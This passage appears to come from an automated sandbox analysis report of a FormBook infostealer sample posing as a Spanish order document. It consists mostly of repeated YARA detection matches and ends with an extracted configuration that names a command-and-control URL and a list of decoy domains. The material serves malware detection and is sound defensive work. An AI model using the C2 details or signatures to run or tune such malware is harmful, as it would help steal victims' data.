18.0.mobsync.exe.72480000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.2.mobsync.exe.72480000.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.mobsync.exe.72480000.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.mobsync.exe.72480000.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
15.2.logagent.exe.72480000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.logagent.exe.72480000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.logagent.exe.72480000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
18.2.mobsync.exe.72480000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.2.mobsync.exe.72480000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.mobsync.exe.72480000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
15.2.logagent.exe.72480000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.logagent.exe.72480000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.logagent.exe.72480000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 85 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Se adjunta el pedido, proforma.exe	Virustotal: Detection: 42%			Perma Link
Source: Se adjunta el pedido, proforma.exe	ReversingLabs: Detection: 50%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
